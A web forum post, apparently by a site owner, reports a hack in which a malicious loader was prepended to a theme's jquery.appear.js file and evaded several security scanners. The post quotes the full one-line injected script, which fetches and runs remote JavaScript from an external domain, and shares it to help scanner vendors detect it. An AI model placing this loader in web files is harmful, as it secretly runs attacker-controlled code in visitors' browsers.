Malicious code not detected in scans

Hi,

A few days ago my web site was hacked.

Even though we did full disinfections, restored backup files multiple times, and added strong security systems and with CDN Cloudflare, Google Search Console, and McAfee, we were locked out of the site (and domain) for containing malicious code, for a long time. .
After requesting several revisions without success, we found the problem.

A function added to the head of a theme’s .js file, which uses a “Get” call and links to an encrypted external link.

It is only shown when loading certain pages in the browser code inside (it is not always shown…)

This code is invisible to the user and to monitoring systems such as Anti-Malware Security and Brute-Force Firewall, Wordfence, iThemes S and AIO S. None have detected it.

For this reason we are notifying each plugin to review this malicious code and add it in some way to their scan lists.

Apparently it is relatively new and little used, there are very few references in google(https://www.google.com/search?q=cX458IXVf9TcXk%2FnhNa%2By0nWDAAY7JxpQFgRZT9%2FnUk%3D&newwindow=1&rlz=1C1UUXU_esAR993AR993&sxsrf=APwXEden26t fFRvJGkav31Fi7ZMfrTUvk)

Copy of the code found in the head of the file: “jquery.appear.js“

;(function(r,f,u,o,h,s){h=f.createElement(u);s=f.getElementsByTagName(u)[0];h.async=1;h.src=o; s.parentNode.insertBefore(h,s);})(window,document,'script','https://scripts.asi.services/cX458IXVf9TcXk/nhNa+y0nWDAAY7JxpQFgRZT9/nUk=');

I hope it works for you. Any questions ask me.

Greetings.